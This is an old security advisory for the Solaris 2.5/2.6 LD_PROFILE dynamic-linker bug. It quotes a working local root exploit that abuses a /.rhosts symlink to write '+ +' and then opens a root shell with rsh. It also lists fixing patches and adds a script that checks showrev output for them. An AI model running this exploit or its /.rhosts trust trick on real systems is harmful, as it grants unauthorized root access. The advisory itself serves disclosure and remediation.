COMMAND
LD_PROFILE
SYSTEMS AFFECTED
Solaris 2.5, 2.6
PROBLEM
Steve Mynott posted the following. It is a local root exploit:
#! /bin/ksh
# LD_PROFILE local root exploit for solaris
# steve@tightrope.demon.co.uk 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + > /.rhosts
rsh -l root localhost csh -i
SOLUTION
This is bug 4150646 (or rather, 1241843, which resurfaced after an
extensive rewrite of the dynamic linker). It's been fixed in
Solaris 7 and with the following patches in other releases:
103242-07: SunOS 5.5: linker patch
103243-07: SunOS 5.5_x86: linker patch
103627-11: SunOS 5.5.1: Linker patch
103628-10: SunOS 5.5.1_x86: Linker patch
105490-07: SunOS 5.6: linker patch
105491-05: SunOS 5.6_x86: linker patch
The bug was originally fixed in 5.5.1 and back patched, but
rediscovered back in 2.6 (which also meant it was in the process
of being patched back into 5.5/5.5.1); this was all well before
S7 was released. The original bug was also fixed in the
following patches:
102049-05: SunOS 5.4: linker fixes
102303-05: SunOS 5.4: POINT PATCH: linker fixes
102304-05: SunOS 5.4_x86: POINT PATCH: linker fixes
102778-03: SunOS 5.4_x86: linker patch
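As an added check (not part of the advisory), the script below reads `showrev -p` output and reports whether the linker patch listed above for a given release is installed at the required revision or later. The release key, the `_x86` suffix convention and the `Patch: NNNNNN-RR ...` line format are assumptions; the two sample outputs are constructed for demonstration.

```shell
#!/bin/sh
# Added example: verify the LD_PROFILE linker patch from the SOLUTION list.
# Assumes showrev -p prints one line per patch beginning "Patch: NNNNNN-RR".
# Release key is `uname -r`, with "_x86" appended on x86 (assumed convention).

# Map a release key to the required patch id and revision from the list above.
required_patch() {
    case "$1" in
        5.5)       echo 103242-07 ;;
        5.5_x86)   echo 103243-07 ;;
        5.5.1)     echo 103627-11 ;;
        5.5.1_x86) echo 103628-10 ;;
        5.6)       echo 105490-07 ;;
        5.6_x86)   echo 105491-05 ;;
        *)         return 1 ;;
    esac
}

# Read showrev -p text on stdin; print the highest installed revision of the
# patch base id given as $1 (nothing printed if the patch is absent).
installed_rev() {
    awk -v base="$1" -v best=0 '
        $1 == "Patch:" { split($2, p, "-"); if (p[1] == base && p[2] + 0 > best) best = p[2] + 0 }
        END { if (best > 0) print best }'
}

# Usage: showrev -p | ld_profile_patched "$(uname -r)"
# Returns 0 if patched, 1 if missing or too old, 2 for an unknown release.
ld_profile_patched() {
    req=$(required_patch "$1") || { echo "unknown release: $1" >&2; return 2; }
    base=${req%-*}
    need=${req#*-}
    have=$(installed_rev "$base")
    [ -n "$have" ] && [ "$have" -ge "${need#0}" ]
}

# Constructed sample outputs (not from a real system).
SAMPLE_PATCHED='Patch: 103640-12 Obsoletes: Requires: Incompatibles: Packages: SUNWcsu
Patch: 103627-11 Obsoletes: 103683-05 Requires: Incompatibles: Packages: SUNWcsu'
SAMPLE_OLD='Patch: 103627-09 Obsoletes: 103683-05 Requires: Incompatibles: Packages: SUNWcsu'

for s in "$SAMPLE_PATCHED" "$SAMPLE_OLD"; do
    if printf '%s\n' "$s" | ld_profile_patched 5.5.1; then echo "5.5.1: patched"
    else echo "5.5.1: NOT patched (bug 4150646 exposure)"; fi
done
```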